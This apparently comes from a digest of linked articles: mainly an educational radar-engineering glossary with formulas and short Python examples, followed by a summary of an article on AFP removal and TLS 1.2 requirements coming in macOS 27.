The problem of determining which radar measurements belong to which tracked targets. In multi-target environments, measurements from different targets can fall within each other's tracking gates, creating ambiguous correspondence. Algorithms range from Nearest Neighbor (simple, brittle) to JPDA (probabilistic, polynomial) to MHT (optimal, exponential worst-case). Correct association is prerequisite to accurate track maintenance.

Detection Probability Pd

The probability that the radar correctly declares a target present when one actually exists. Pd depends on SNR and the detection threshold T: higher SNR means the target distribution is better separated from the noise distribution. For a given SNR, raising the threshold reduces both Pd (more misses) and Pfa (fewer false alarms). The ROC curve traces all Pd–Pfa pairs for a given SNR.

Pd = P(X > T | H₁)
Swerling 1: Pd = Pfa^(1/(1+SNR))

Doppler Effect

The apparent change in frequency of a wave caused by relative motion between source and observer. For radar, a target moving radially at velocity v\_r shifts the echo frequency by f\_d = 2v\_r/λ — positive (upshift) if closing, negative (downshift) if opening. The factor of 2 arises from the round-trip: the radar "hears" the shift on both transmission and reception.

f\_d = 2·v\_r/λ = 2·v\_r·f\_c/c

DRFM Digital Radio Frequency Memory

An electronic warfare device that captures a radar's transmitted waveform digitally, stores it, and retransmits it with controlled modifications (delay, Doppler shift, amplitude changes). DRFM enables sophisticated deception jamming: false targets at controlled ranges and velocities, range-gate pull-off, velocity gate pull-off, and so on. Modern DRFMs operate with GHz bandwidth and nanosecond timing precision.

Duty Cycle

The fraction of time the radar is transmitting: DC = τ · PRF = τ / PRI. High duty cycle means more average power (better SNR) but less time available to receive echoes (reduced range). CW and FMCW radars have duty cycle = 1 (100%), requiring transmit/receive isolation by physical separation or polarization. Pulsed radars typically have duty cycles of 1–10%.

DC = τ · PRF = Pt\_avg / Pt\_peak

E

Electronic Warfare EW

All military and security applications of the electromagnetic spectrum for attack, defense, and support. Electronic Attack (EA) includes jamming, deception, and directed energy. Electronic Protection (EP) includes ECCM techniques like frequency agility, sidelobe blanking, LPI waveforms, and spatial nulling. Electronic Support (ES) is passive interception and signals intelligence. Radar and EW systems are in continuous technological competition.

F

False Alarm Pfa

A detection event where the radar declares a target present when no target exists — noise or clutter exceeds the threshold. Expressed as a probability Pfa = P(noise > T). Even Pfa = 10⁻⁶ (one in a million) generates about ten false alarms per second at typical radar PRFs (10 kHz PRF × 1000 range bins = 10⁷ tests/second). CFAR keeps Pfa constant; a fixed threshold does not.

Pfa = exp(−T²/2σ\_n²) \[Rayleigh noise]
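Inverting the Rayleigh expression gives the threshold for a desired Pfa; a sketch using the PRF and bin count from the example above:

```python
import math

def threshold_for_pfa(pfa: float, sigma_n: float = 1.0) -> float:
    """Pfa = exp(−T²/(2σ²))  →  T = σ·√(−2·ln Pfa), for Rayleigh envelope noise."""
    return sigma_n * math.sqrt(-2.0 * math.log(pfa))

T = threshold_for_pfa(1e-6)               # ≈ 5.26·σ
false_alarm_rate = 1e-6 * 10e3 * 1000     # 10⁷ tests/s × Pfa = 10 false alarms/s
```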

FMCW Frequency-Modulated Continuous Wave

A radar architecture that transmits a continuous frequency sweep while simultaneously receiving. Mixing transmit and receive signals produces a "beat" frequency directly proportional to target range. FMCW has no minimum range (no T/R switching delay), low peak power (excellent for LPI), compact hardware integration, and simultaneous range-velocity measurement. It is the standard architecture for automotive radar (77 GHz), drone altitude sensors, and industrial level gauges.

f\_beat = 2·R·B/(c·T) ΔR = c/(2B)
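The beat-frequency-to-range mapping in code; the sweep parameters below are an assumed automotive-style example, not from any specific sensor:

```python
C = 3e8   # m/s

def fmcw_range_m(f_beat: float, sweep_bw: float, sweep_time: float) -> float:
    """Range from beat frequency: f_beat = 2·R·B/(c·T)  →  R = f_beat·c·T/(2B)."""
    return f_beat * C * sweep_time / (2.0 * sweep_bw)

# Illustrative sweep: B = 1 GHz over T = 50 µs
r = fmcw_range_m(f_beat=667e3, sweep_bw=1e9, sweep_time=50e-6)   # ≈ 5 m
delta_r = C / (2 * 1e9)                                          # 0.15 m resolution
```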

Frequency Agility

Changing the radar's carrier frequency pseudo-randomly from pulse to pulse across a wide band. Agility provides: (1) ECCM — spot jammers must spread power across the entire band, reducing J/S; (2) RCS decorrelation — independent scintillation samples improve detection of Swerling 1/2 targets; (3) range sidelobe reduction in synthetic aperture processing. The frequency hop band must be wider than the coherent processing bandwidth.

G

Gain (Antenna) G

The ratio of the antenna's peak radiated power density (in its direction of maximum radiation) to that of a lossless isotropic radiator fed with the same total power. Gain is dimensionless but typically expressed in dBi (dB relative to isotropic). Gain appears as G² in the monostatic Radar Range Equation — once for transmit focusing, once for receive collecting area. A 2× aperture area increase gives +3 dB of gain; since SNR scales as G² and range as SNR^(1/4), maximum detection range improves by ×2^(1/2) ≈ 41%.

G = η·4πA/λ² (aperture antenna) G\_dBi = 10·log₁₀(G)
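A one-liner confirms the aperture-to-gain relationship (the 0.6 efficiency is an assumed typical value):

```python
import math

def aperture_gain_dbi(area_m2: float, wavelength: float, eff: float = 0.6) -> float:
    """G = η·4πA/λ², expressed in dBi."""
    return 10 * math.log10(eff * 4 * math.pi * area_m2 / wavelength ** 2)

# Doubling aperture area adds 3 dB of gain:
delta = aperture_gain_dbi(2.0, 0.03) - aperture_gain_dbi(1.0, 0.03)   # ≈ 3.01 dB
```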

Grating Lobe

Secondary maxima in a phased array beam pattern that appear at the same gain as the main lobe when element spacing d > λ/2. A target at a grating lobe angle is completely indistinguishable from a main-beam target, producing a catastrophic ambiguity. All practical phased arrays use d ≤ λ/2 to push grating lobes to sin(θ) > 1 (outside the visible hemisphere). Widening element spacing to reduce cost or increase bandwidth must be traded against grating lobe appearance.

sin(θ\_g) = sin(θ\_s) ± n·λ/d, n=1,2,3… No grating lobes when: d ≤ λ/2
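The visibility condition can be checked numerically; a sketch (spacings given in wavelengths):

```python
import math

def grating_lobe_angles(steer_deg: float, d_over_lambda: float) -> list:
    """Visible grating-lobe directions from sin(θ_g) = sin(θ_s) ± n·λ/d."""
    s = math.sin(math.radians(steer_deg))
    lobes = []
    n = 1
    while n / d_over_lambda <= 2.0:        # |sin θ_g − sin θ_s| can be at most 2
        for sg in (s + n / d_over_lambda, s - n / d_over_lambda):
            if -1.0 <= sg <= 1.0:
                lobes.append(math.degrees(math.asin(sg)))
        n += 1
    return lobes

no_lobes = grating_lobe_angles(0.0, 0.5)   # d = λ/2: grating lobes pushed out
lobes = grating_lobe_angles(30.0, 1.0)     # d = λ, steered 30°: lobe near −30°
```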

H

Hypothesis Testing H₀ / H₁

The statistical framework underlying all radar detection. H₀ (null hypothesis) = no target present; H₁ (alternative) = target present. The Neyman-Pearson lemma proves that the likelihood ratio test is optimal: it maximizes Pd for a given Pfa. In practice the exact likelihood ratio requires knowledge of the target amplitude distribution, which drives the choice of Swerling model and CFAR variant.

I

Improvement Factor IF

For MTI processors, the improvement factor (also called clutter improvement factor or CIF) is the ratio of signal-to-clutter ratio at the output to that at the input, expressed in dB. A single-delay MTI canceller achieves 30–40 dB IF on ideal stationary clutter. IF is degraded by clutter spectral width (wind-induced motion, antenna scanning, platform motion), receiver phase noise, and A/D quantization errors.

IF = SCR\_out / SCR\_in (linear) IF\_dB = SCR\_out\_dB − SCR\_in\_dB

J

J/S Ratio Jamming-to-Signal Ratio

The ratio of jamming power to target echo power at the radar receiver. A self-screening jammer (on the target aircraft) sees the signal power fall as 1/R⁴ (two-way propagation) while jamming power falls only as 1/R² (one-way propagation). At long range the jammer wins; at short range (burn-through range) the echo dominates. Stand-off jammers (separate platform) see different geometry.

J/S = 4π·Pj·Gj·R⁴ / (Pt·G·σ·R\_j²) Self-screen (R\_j = R): J/S ∝ R² (jammer gains at range)

K

Kalman Filter

A recursive algorithm for optimal state estimation in linear systems with Gaussian noise. Each cycle alternates between prediction (propagating the state estimate and uncertainty forward using the motion model) and measurement update (correcting the prediction using new observations via the Kalman gain). The Kalman gain automatically weights prediction vs measurement based on their respective uncertainties — optimal in the MMSE sense for linear Gaussian systems.

K = P·Hᵀ·(H·P·Hᵀ+R)⁻¹ x←x+K·(z−Hx)
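The predict/update cycle in miniature — a 1D constant-velocity tracker in Python (the noise covariances and measurement sequence are assumed for illustration):

```python
import numpy as np

dt = 1.0
F = np.array([[1.0, dt], [0.0, 1.0]])   # constant-velocity motion model
H = np.array([[1.0, 0.0]])              # we measure position only
Q = 0.01 * np.eye(2)                    # process noise (assumed)
R = np.array([[4.0]])                   # measurement noise (assumed)

x = np.array([0.0, 0.0])                # state: [position, velocity]
P = 10.0 * np.eye(2)                    # initial uncertainty

for z in [1.1, 2.0, 2.9, 4.2, 5.0]:     # noisy position measurements, true slope ≈ 1
    # Predict: propagate estimate and covariance through the motion model
    x = F @ x
    P = F @ P @ F.T + Q
    # Update: the Kalman gain weights prediction vs measurement uncertainty
    K = P @ H.T @ np.linalg.inv(H @ P @ H.T + R)
    x = x + K @ (np.array([z]) - H @ x)
    P = (np.eye(2) - K @ H) @ P
```

After five updates the velocity estimate converges toward the ~1 unit/step trend even though velocity is never measured directly — the filter infers it through the motion model.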

L

LFM Chirp Linear Frequency Modulation

A pulse waveform whose instantaneous frequency sweeps linearly from f₀ to f₀+B over the pulse duration T. The matched filter for an LFM chirp produces a compressed output with width ≈ 1/B — achieving fine resolution independent of pulse length. The time-bandwidth product BT is the pulse compression gain (typically 100–10,000 in modern systems). LFM is the most widely used pulse compression waveform due to its Doppler tolerance and ease of implementation.

ΔR = c/(2B) G\_c = B·T

LPI Low Probability of Intercept

A design philosophy and set of waveform/system techniques that minimize the likelihood of an adversary's electronic support (ES) receiver detecting the radar's transmissions. LPI techniques include: FMCW (low peak power), frequency agility (spread signal across wide band), burst mode operation, low sidelobes, and high antenna directivity. LPI radar sacrifices range or revisit rate to reduce detectability.

M

Matched Filter

A linear filter whose impulse response is the time-reversed complex conjugate of the transmitted waveform. The matched filter maximizes the output SNR for any given waveform and is provably optimal under the Neyman-Pearson criterion. Its output is the cross-correlation of the received signal with the transmitted template; peaks in the output correspond to target ranges. The width of the peak equals the inverse signal bandwidth — which is why range resolution equals c/(2B).

h(t) = s\*(T−t) SNR\_out = 2E/N₀
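A numpy sketch (assumed sample rate and chirp parameters) showing the matched filter as correlation, with the compressed peak equal to the pulse energy:

```python
import numpy as np

fs = 10e6                      # sample rate, Hz
T, B = 100e-6, 2e6             # pulse length and swept bandwidth
t = np.arange(int(T * fs)) / fs
chirp = np.exp(1j * np.pi * (B / T) * t ** 2)   # baseband LFM, 0 → B over T

h = np.conj(chirp[::-1])       # matched filter h(t) = s*(T − t)
out = np.convolve(chirp, h)    # cross-correlation with the template

peak = np.abs(out).max()       # pulse energy (number of unit-amplitude samples)
gain = B * T                   # compression gain = time-bandwidth product = 200
```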

MIMO Radar Multiple-Input, Multiple-Output

A radar architecture that transmits orthogonal waveforms from multiple antennas simultaneously. Each receive element separates the orthogonal transmit waveforms using matched filters, creating N\_t×N\_r virtual receive channels. The resulting virtual aperture has N\_t times more elements than a conventional phased array of the same physical size, providing superior angular resolution and degrees of freedom for STAP and parameter estimation.

Virtual DoF = N\_t × N\_r

MTI Moving Target Indication

A signal processing technique that cancels stationary clutter by subtracting consecutive pulse returns. The clutter, nearly identical between pulses, cancels; moving targets change phase each PRI and survive. Single-delay MTI uses H(z)=1−z⁻¹ (notch at DC); double-delay MTI deepens the notch. MTI is the simplest form of Doppler processing and is the predecessor to modern pulse-Doppler and STAP processors.

y\[n] = x\[n] − x\[n−1] → H(e^jω) = 1 − e^{−jω}
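The canceller is two lines of code; a sketch with an assumed 1 kHz PRF and a 100 Hz Doppler target:

```python
import numpy as np

prf = 1e3                          # Hz
n = np.arange(32)                  # slow-time pulse index

clutter = np.ones(32, dtype=complex)                    # stationary: zero Doppler
target = np.exp(1j * 2 * np.pi * (100.0 / prf) * n)     # 100 Hz Doppler

def mti(x):
    """Single-delay canceller y[n] = x[n] − x[n−1]."""
    return x[1:] - x[:-1]

clutter_residue = np.abs(mti(clutter)).max()   # 0: stationary clutter cancels exactly
target_residue = np.abs(mti(target)).max()     # |1 − e^{−jω}| = 2·sin(ω/2) ≈ 0.62
```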

N

Noise Figure F or NF

A measure of the excess noise added by a receiver component or chain above the thermal noise floor. Defined as F = SNR\_in / SNR\_out (linear). A perfect noiseless receiver has F = 1 (0 dB). Real LNAs achieve 0.5–3 dB; system noise figures of 3–10 dB are common. The Friis cascade formula shows that the first element (LNA) contributes most: cooling or improving it gives the largest system benefit.

F\_total = F₁ + (F₂−1)/G₁ + (F₃−1)/(G₁G₂) + …
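The cascade formula in code, showing why the first stage dominates (stage values are an assumed example, not a specific receiver):

```python
import math

def friis_noise_figure(stages):
    """Cascade noise figure from (F_linear, G_linear) pairs, first stage first."""
    f_total, g_acc = 1.0, 1.0
    for f, g in stages:
        f_total += (f - 1.0) / g_acc   # later stages divided by preceding gain
        g_acc *= g
    return f_total

lin = lambda db: 10 ** (db / 10)
# LNA (NF 1 dB, gain 20 dB) followed by a noisier stage (NF 10 dB, gain 10 dB)
nf_db = 10 * math.log10(friis_noise_figure([(lin(1), lin(20)), (lin(10), lin(10))]))
# ≈ 1.3 dB: the LNA's 20 dB of gain suppresses the second stage's contribution
```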

O

Off-Boresight Angle

The angular separation between the radar's boresight (main beam axis) and the direction to a target of interest. Antenna gain falls off as the off-boresight angle increases, following the one-way pattern G(θ). At the 3 dB beamwidth (θ₃dB/2 off boresight), gain drops by 3 dB one-way (6 dB two-way), reducing SNR significantly. Targets at large off-boresight angles may be seen only through sidelobes.

G(θ) ≈ G₀ · sinc²(πDsinθ/λ) (uniform aperture)

Operating Frequency f₀, λ

The carrier frequency at which a radar transmits. Operating frequency determines wavelength (λ = c/f₀), which in turn affects range resolution, Doppler sensitivity, antenna size, and atmospheric propagation losses. Common radar bands: L-band (1–2 GHz, long-range surveillance), S-band (2–4 GHz, weather/ATC), C-band (4–8 GHz, weather), X-band (8–12 GHz, fire control/imaging), Ka-band (27–40 GHz, seekers and police speed radar); automotive radar sits higher still, at 77 GHz.

λ = c / f₀ (c ≈ 3×10⁸ m/s)

P

Phased Array

An antenna array in which the phase (and optionally amplitude) of the signal applied to each element is individually controlled to steer and shape the beam electronically, without mechanical movement. Phase steering can redirect the beam in microseconds — versus tens of milliseconds for mechanically scanned antennas. Phased arrays enable simultaneous multiple beams, adaptive nulling, and rapid interleaving of different radar modes.

PPI Scope Plan Position Indicator

A radar display that presents a top-down (azimuth vs range) 2D map of the surveillance area. The radar antenna rotates (or the beam scans electronically), and each range-azimuth cell is mapped to a pixel. Targets appear as bright spots at their true geographic positions. PPI is the standard display for air traffic control, weather radar, and naval surveillance systems.

PRF Pulse Repetition Frequency

The number of pulses transmitted per second (Hz). PRF simultaneously sets maximum unambiguous range (R\_u = c/2PRF) and maximum unambiguous velocity (v\_u = PRF·λ/4) in opposite directions — increasing PRF extends velocity coverage but reduces range coverage. The PRF ambiguity product R\_u·v\_u = c²/(8f\_c) is fixed by physics. Three PRF regimes: low PRF (range unambiguous), medium PRF (both ambiguous), high PRF (velocity unambiguous).

R\_u = c/(2·PRF) v\_u = PRF·λ/4
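Both limits, and their fixed product, in a few lines (X-band wavelength assumed for the example):

```python
C = 3e8   # m/s

def unambiguous(prf: float, wavelength: float):
    """R_u = c/(2·PRF) and one-sided v_u = PRF·λ/4."""
    return C / (2.0 * prf), prf * wavelength / 4.0

# λ = 3 cm: a low PRF trades velocity coverage for range coverage
r_u, v_u = unambiguous(prf=1e3, wavelength=0.03)    # 150 km, 7.5 m/s
# The product is fixed by physics: R_u·v_u = c·λ/8 = c²/(8·f_c)
```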

Pulse Compression

A waveform processing technique that transmits a long coded pulse (for energy) but achieves the range resolution of a short pulse (for resolution). The most common form uses an LFM chirp; phase-coded waveforms (Barker, Frank codes) are also used. The time-bandwidth product B·T is the compression gain: the ratio of compressed to uncompressed pulse width. Pulse compression decouples the energy–resolution trade-off that limits simple pulsed radars.

G\_c = B·T ΔR = c/(2B) (compressed)

Q

Quadrature Sampling I/Q

A signal representation using two components sampled in phase quadrature (90° apart): In-phase (I) and Quadrature (Q). Together they form a complex-valued signal s(t) = I(t) + jQ(t) that preserves both amplitude and phase of the radar return. I/Q sampling enables coherent processing, Doppler estimation, and unambiguous phase measurement. Modern radars digitize I and Q directly at IF or use digital downconversion from RF samples.

s(t) = I(t) + jQ(t) A = √(I²+Q²) φ = atan2(Q,I)

R

Radar Cross Section RCS, σ

The effective scattering area of a target, defined as the area of an equivalent perfectly reflecting isotropic sphere that would return the same power to the radar. RCS depends on target shape, size, material, orientation (aspect angle), and radar frequency. Typical values: aircraft 1–10 m² (0–10 dBsm), stealth aircraft ~0.001 m² (−30 dBsm), ship 1,000–100,000 m² (30–50 dBsm). A 10 dB reduction in RCS cuts maximum detection range by ~44%.

σ\_dBsm = 10·log₁₀(σ) sphere: σ = πr²
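The dBsm conversion and the range impact of RCS reduction, sketched:

```python
import math

def dbsm(sigma_m2: float) -> float:
    """RCS in dB relative to 1 m²."""
    return 10 * math.log10(sigma_m2)

def sphere_rcs(radius_m: float) -> float:
    """Optical-region RCS of a conducting sphere: σ = π·r²."""
    return math.pi * radius_m ** 2

# R_max ∝ σ^(1/4), so a 10 dB RCS cut scales range by 0.1^0.25 ≈ 0.56 (−44%)
range_factor = 0.1 ** 0.25
```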

Radar Range Equation RRE

The fundamental equation relating radar detection range to system parameters. It expresses the received SNR as a function of transmit power, antenna gain, wavelength, RCS, range, and noise. The R⁴ dependence (two-way propagation squared) is the central challenge of long-range radar — doubling range requires 16× more power or 4× more antenna area. All Phase I–II modules build toward this single equation.

SNR = Pt·G²·λ²·σ / ((4π)³·R⁴·kTBFL)
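The equation is easy to evaluate end to end; all parameter values below are illustrative, and the R⁴ penalty falls out directly:

```python
import math

K_B = 1.38e-23   # Boltzmann constant, J/K

def rre_snr_db(pt_w, gain_db, wavelength, rcs, range_m,
               t_sys=290.0, bw_hz=1e6, nf_db=3.0, loss_db=3.0):
    """Monostatic RRE: SNR = Pt·G²·λ²·σ / ((4π)³·R⁴·kTBFL), in dB."""
    g = 10 ** (gain_db / 10)
    num = pt_w * g ** 2 * wavelength ** 2 * rcs
    den = ((4 * math.pi) ** 3 * range_m ** 4 * K_B * t_sys * bw_hz
           * 10 ** (nf_db / 10) * 10 ** (loss_db / 10))
    return 10 * math.log10(num / den)

# Doubling range costs 10·log10(2⁴) ≈ 12 dB — the R⁴ law in action
drop = rre_snr_db(1e6, 35, 0.03, 1.0, 50e3) - rre_snr_db(1e6, 35, 0.03, 1.0, 100e3)
```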

ROC Curve Receiver Operating Characteristic

A plot of detection probability Pd versus false alarm probability Pfa for all possible threshold values at a given SNR. Every point on the curve represents a different threshold setting. Higher SNR shifts the ROC curve up and to the left (better performance). The ideal ROC curve passes through (Pfa=0, Pd=1) — a perfect detector. The area under the ROC curve (AUC) is a single-number performance metric.

S

SAR Synthetic Aperture Radar

A radar imaging technique that exploits the motion of the platform (aircraft, satellite) to synthesize a virtual aperture far larger than the physical antenna. By coherently processing echoes collected over a long along-track distance L\_s, SAR achieves cross-range resolution δ\_cr ≈ D/2 — independent of range and wavelength. SAR enables centimeter-resolution imaging from low Earth orbit and is used for terrain mapping, change detection, and reconnaissance.

δ\_cr ≈ D/2 (focused SAR, D = physical aperture)

Sidelobes

Secondary maxima of the antenna beam pattern or matched filter output that appear outside the main lobe. Antenna sidelobes allow targets or jammers at off-boresight angles to produce returns that appear to come from the main beam direction. Matched filter range sidelobes create false peaks around a real target. Both are controlled by window functions (tapering) at a cost in main lobe width. The first sidelobe of a uniform aperture/rectangle window is −13.2 dB; Hamming gives −42.7 dB.

SNR Signal-to-Noise Ratio

The ratio of target signal power to noise power at the detector input, expressed linearly or in dB. SNR is the primary determinant of detection performance: higher SNR means better separation of the target and noise distributions, enabling either higher Pd at a given Pfa, or the same Pd at lower Pfa. The SNR required for a given (Pd, Pfa) pair is the detection threshold and is read from ROC curves or Albersheim's equation.

SNR\_dB = 10·log₁₀(P\_signal / P\_noise)

Staggered PRF

A technique using two or more alternating pulse repetition frequencies with incommensurate ratios to extend the unambiguous range and velocity coverage beyond what any single PRF can achieve. Based on the Chinese Remainder Theorem: the extended unambiguous intervals are the least common multiples of the individual intervals. Staggered PRF also moves MTI blind speeds — a target visible at one PRF is likely visible at the other.

STAP Space-Time Adaptive Processing

An adaptive signal processing technique that simultaneously exploits spatial (array element) and temporal (pulse) degrees of freedom to cancel interference. For an airborne radar, STAP places a 2D null in angle-Doppler space along the clutter ridge (where ground clutter appears at all Doppler shifts proportional to platform velocity × angle cosine). STAP generalizes both beamforming (spatial only) and MTI (temporal only) into a unified framework.

w\_opt = R⁻¹·s / (sᴴ·R⁻¹·s)

Swerling Models

A set of four statistical models (Sw0–Sw4) describing how target RCS fluctuates over time. Sw0: non-fluctuating (steady RCS). Sw1: exponential RCS distribution, scan-to-scan decorrelation (many comparable scatterers — e.g. an aircraft body). Sw2: exponential, pulse-to-pulse decorrelation. Sw3: chi-squared 4 DoF, scan-to-scan (one dominant scatterer). Sw4: chi-squared 4 DoF, pulse-to-pulse. Fluctuating targets (Sw1–4) require more SNR than non-fluctuating ones for Pd > 0.5 — the fluctuation loss.

Sw1: Pd = Pfa^(1/(1+SNR\_avg))

System Losses L

All signal power losses that reduce the received SNR below what the Radar Range Equation would predict for an ideal system. Includes: feed and transmission line losses, antenna pointing loss, signal processing losses (range and Doppler straddle losses), A/D quantization loss, matched filter mismatch, propagation losses (rain, atmospheric), and system integration losses. Typically 3–10 dB total. Must be measured and budgeted for each specific system design.

T

Thermal Noise

Random electrical noise generated by the thermal agitation of electrons in any resistive component above absolute zero. It is irreducible — the fundamental detection floor for every radar. The available noise power from a resistor at temperature T over bandwidth B is P = k\_B·T·B. At 290 K and 1 MHz bandwidth, this is −114 dBm. Reducing system temperature (cooling the LNA), narrowing bandwidth, or lowering the noise figure are the only ways to lower the floor.

P\_noise = k\_B · T · B k\_B = 1.38×10⁻²³ J/K
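Converting k·T·B to dBm reproduces the −114 dBm figure quoted above:

```python
import math

K_B = 1.38e-23   # Boltzmann constant, J/K

def noise_floor_dbm(temp_k: float, bw_hz: float) -> float:
    """Thermal noise power k·T·B, expressed in dBm (dB relative to 1 mW)."""
    return 10 * math.log10(K_B * temp_k * bw_hz / 1e-3)

p = noise_floor_dbm(290.0, 1e6)   # ≈ −114 dBm
```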

Tracking Gate Validation Gate

An ellipsoidal region in measurement space centered on a track's predicted position, used to determine which measurements could plausibly have originated from that track. Measurements falling inside the gate are candidates for association; those outside are rejected. The gate size is set by the innovation covariance S and a chi-squared threshold corresponding to the desired gate probability P\_g. Small gates reduce false association but risk missing the true measurement when prediction is imprecise.

d² = yᵀ·S⁻¹·y ≤ χ²\_{n,Pg}
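The gate test is a single Mahalanobis-distance comparison; a sketch with an assumed diagonal innovation covariance:

```python
import numpy as np

def in_gate(innovation, S, gamma=9.21):
    """Validation gate test d² = yᵀ·S⁻¹·y ≤ γ.
    γ = 9.21 is the 99% point of χ² with 2 degrees of freedom."""
    y = np.asarray(innovation, dtype=float)
    d2 = float(y @ np.linalg.solve(np.asarray(S, dtype=float), y))
    return d2 <= gamma

S = np.diag([4.0, 4.0])           # innovation covariance (illustrative)
accept = in_gate([1.0, 1.0], S)   # d² = 0.5 → inside the gate
reject = in_gate([8.0, 0.0], S)   # d² = 16  → outside
```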

U

Unambiguous Range R\_u

The maximum target range at which the radar can correctly identify the echo as belonging to the most recent pulse. Beyond R\_u, the echo arrives after the next pulse has been transmitted and is incorrectly attributed to that later pulse, causing the radar to report a "folded" shorter range. R\_u is set by the PRF: R\_u = c/(2·PRF). Increasing PRF extends Doppler coverage but shrinks R\_u.

R\_u = c / (2·PRF)

Unambiguous Velocity v\_u

The maximum radial velocity the radar can unambiguously measure. Beyond v\_u, the target's Doppler phase advance per PRI exceeds π radians (the Nyquist limit), causing the velocity to alias to an incorrect lower value or wrong direction. v\_u is set by the PRF and wavelength: v\_u = PRF·λ/4. Decreasing PRF (to extend range) shrinks v\_u.

v\_u = PRF · λ / 4

W

Window Function Taper, Weighting

An amplitude weighting applied to an array aperture (spatial window) or pulse bandwidth (spectral window) to reduce sidelobes at the cost of slightly widened main lobe. Common windows: Rectangular (no taper — highest sidelobes −13.2 dB, narrowest main lobe), Hamming (−42.7 dB sidelobes, 1.46× wider main lobe), Taylor (adjustable −25 to −50 dB sidelobes), Chebyshev (equiripple — minimum main lobe width for given sidelobe level). Used in both antenna pattern shaping and range/Doppler processing.

ABOUT RADAR LABORATORY

A VISUAL COURSE FOR BUILDING PRACTICAL RADAR INTUITION

PURPOSE

**Radar Laboratory is an interactive learning environment for engineers who need to understand radar behavior without treating the sensor as a black box.**

Each module pairs a visual scene with a plot, live readouts, and a short explanation. The goal is to make the physical behavior visible first, then connect that behavior to the equations.

The material is written for new engineers, systems engineers, analysts, and software developers who work around radar systems but may not have formal RF or electrical-engineering training.

LEARNING PATH

The course starts with the measurements radar makes directly, then builds toward performance limits, detection, digital processing, and advanced phenomenology.

- **Measurement foundations:** electromagnetic waves, range timing, PRF, range resolution, Doppler, and ambiguity.
- **Waveforms, targets, and aperture:** pulse energy, matched filtering, RCS, antenna gain, arrays, beamwidth, and scanning.
- **Performance and propagation:** noise, SNR, coherent integration, the radar range equation, free-space loss, atmospheric loss, multipath, horizon, and clutter.
- **Detection:** thresholding, clutter-limited detection, and CFAR.
- **Digital processing:** IQ data, Fourier transforms, fast/slow time, range bins, Doppler spectra, and range-Doppler maps.
- **Advanced phenomenology:** trajectories, scatterers, ISAR, MTI, STAP, and electronic attack.

ACCURACY AND SCOPE

The simulations use standard radar relationships and simplified engineering models. They are intended for training, communication, and first-order intuition.

Radar Laboratory is not a replacement for a validated radar performance model, mission-analysis tool, hardware test, or scenario-specific simulation. When a module uses a simplification, the module text states the main assumption and keeps the core physical relationship intact.

HOW TO USE IT

- Start with the scene and identify what is physically happening.
- Move one control at a time.
- Watch the plot and readouts change.
- Use the checkpoint to confirm the takeaway.
- Use the theory page when you want the equation in context.

REFERENCE BASIS

The content follows standard radar, antenna, detection, propagation, and DSP references, including Skolnik, Richards, Levanon & Mozeson, Balanis, Van Trees, Nathanson, Ward, Kay, Oppenheim & Schafer, Stimson, and ITU-R recommendations P.676, P.838, and P.530.

Equations are used to support intuition. Engineering decisions should still be checked against authoritative references and validated models.

TECHNOLOGY

Radar Laboratory is a single-file HTML application using HTML5 Canvas, CSS, and vanilla JavaScript. It can be hosted as a static site or opened locally for demonstration and training.


---

## [HN-TITLE] 16. Networking changes coming in macOS 27

- **Source**: [https://eclecticlight.co/2026/04/23/networking-changes-coming-in-macos-27/](https://eclecticlight.co/2026/04/23/networking-changes-coming-in-macos-27/)
- **Site**: The Eclectic Light Company
- **Submitter**: pvtmert (Hacker News)
- **Published**: 2026-04-23
- **HN activity**: 211 points · [185 comments](https://news.ycombinator.com/item?id=47923010)
- **Length**: 584 words (~3 min read)
- **Language**: en

Apple seldom gives advance notice of significant changes coming in the next major version of macOS before its first beta release at WWDC. One significant exception is changes to networking that could impact enterprise users. This year, with just over six weeks to go before the first beta of macOS 27, we already have two warnings of what might be coming.

#### AFP and network storage

Apple made SMB its primary file-sharing protocol in OS X 10.9 Mavericks, over 12 years ago, and has repeatedly told us that support for its predecessor AFP will be removed in the future. It repeated those warnings with macOS Sequoia 15.5, but still hasn’t confirmed when AFP will be lost.

Those who are most likely to be affected by this are still using Time Capsules, or elderly NAS systems that don’t support SMB3. As removal of AFP support won’t be retrospective, provided that none of your Macs will be upgraded to macOS 27, you’ll still be able to use AFP for your file shares and Time Machine backups. But if you have an Apple silicon Mac and AFP support is dropped from macOS 27, that would leave you unable to upgrade without replacing your network storage.

#### TLS and servers

Most recently, Apple [has warned](https://support.apple.com/126655) that a future version of macOS, and its device OSes, will require connections to certain servers to be made using at least TLS 1.2, with additional requirements. I’m grateful to Rich Trouton’s [Der Flounder blog](https://derflounder.wordpress.com/2026/04/21/apple-enforcing-stricter-network-security-requirements-for-future-versions-of-apples-platform-operating-systems/) for drawing attention to this.

Although Apple carefully avoids being too specific, it warns that this change could come “as early as the next major software release”, although one of the purposes behind its support article is to gauge the impact the change might have on its enterprise customers. If there would be major problems, it may decide to delay its introduction.

This change is more technical, and largely applies to servers involved in supporting MDM, DDM, Automated Device Enrolment, app distribution and installation, and Apple software updates. Fortunately, if you run a local Content Caching server, that *won’t* be affected.

Unlike the removal of AFP, it’s far harder to tell whether a connection to a server complies with the new rules, which require:

- support for TLS 1.2 or later, with TLS 1.3 recommended,
- use of ATS-compliant ciphersuites,
- presentation of valid certificates meeting ATS standards.

The most reliable way to check is to audit connections made to each server, by screening log entries from the Mac or device. That’s further complicated by the fact that the log doesn’t normally gather the information that’s required. So the first step is to install a network diagnostics logging profile available from Apple. The [support article](https://support.apple.com/126655) explains how to collect a logarchive using `sysdiagnose`, and provides a monster predicate to extract relevant entries:  
`"p=appstoreagent|appstored|managedappdistributionagent|managedappdistributiond|ManagedClient|ManagedClientAgent|mdmclient|mdmd|mdmuserd|MuseBuddyApp|NanoSettings|Preferences|profiled|profiles|RemoteManagementAgent|remotemanagementd|Setup|'Setup Assistant'|'System Settings'|teslad|TVSettings|TVSetup|XPCAcmeService AND s=com.apple.network AND m:'ATS Violation'|'ATS FCPv2.1 violation'"`

And yes, Apple is encouraging system administrators to copy and paste a command into Terminal, because there’s no GUI app in macOS that could be used to do that, although you can use it in Ulbow, and I suspect in LogUI with a little modification.

If you’re within the scope of this proposed change, you’ll need to read [Rich Trouton’s account](https://derflounder.wordpress.com/2026/04/21/apple-enforcing-stricter-network-security-requirements-for-future-versions-of-apples-platform-operating-systems/), and Apple’s [full article](https://support.apple.com/126655). I wish you the best of luck. As with AFP, this change shouldn’t apply retrospectively.

#### Timescale

- 27.0 developer beta due on 8 June 2026
- 27.0 public beta due around 8 July 2026
- 27.0 release most probably in mid-September 2026, only five months away.

---

## [HN-TITLE] 17. Spanish archaeologists discover trove of ancient shipwrecks in Bay of Gibraltar

